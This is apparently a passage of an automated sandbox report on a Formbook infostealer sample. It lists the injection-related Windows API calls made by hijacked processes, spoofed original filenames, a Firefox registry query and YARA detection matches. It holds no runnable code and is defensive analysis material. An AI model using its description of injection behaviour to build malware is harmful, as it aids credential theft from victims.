Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA260 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA240 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA3E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA3D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA350 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA310 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA4A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCB470 NtOpenThread
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA460 NtOpenProcess
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA430 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCB410 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA5F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA5A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCBD40 NtSuspendThread
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA520 NtEnumerateKey
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA6D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA650 NtQueueApcThread
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA780 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA720 NtResumeThread
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA710 NtQuerySection
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA700 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCB0B0 NtGetContextThread
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA2F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCBA30 NtSetContextThread
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA220 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_04FCA370 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_02F49A10 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_02F498E0 NtReadFile
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_02F49830 NtCreateFile
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_02F49960 NtClose
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_02F49A0A NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_02F498DA NtReadFile
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_02F4982B NtCreateFile
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_02F4995A NtClose
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4_2_02F497EA NtCreateFile
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 18_2_00C1038C NtQueryInformationProcess
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 18_2_00C164B3 NtQueryInformationProcess
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 20_2_00419830 NtCreateFile
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 20_2_004198E0 NtReadFile
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 20_2_00419960 NtClose
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 20_2_00419A10 NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 20_2_0041982B NtCreateFile
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 20_2_004198DA NtReadFile
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 20_2_0041995A NtClose
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 20_2_00419A0A NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exe | Code function: 20_2_004197EA NtCreateFile
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04FDDDE8 appears 34 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04F8B0E0 appears 168 times
          Source: 168768566-104646-sdfnt5-8.exeBinary or memory string: OriginalFilename vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000000.00000000.762313256.00000000000C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServiceHost.dll8 vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000000.00000000.762313256.00000000000C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHSDNvk.exeR vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exeBinary or memory string: OriginalFilename vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000002.00000002.829524567.0000000001A6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000002.00000000.770340960.0000000000DB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServiceHost.dll8 vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000002.00000000.770340960.0000000000DB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHSDNvk.exeR vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000002.00000002.828055416.00000000017B0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exeBinary or memory string: OriginalFilenameServiceHost.dll8 vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exeBinary or memory string: OriginalFilenameHSDNvk.exeR vs 168768566-104646-sdfnt5-8.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
          Source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE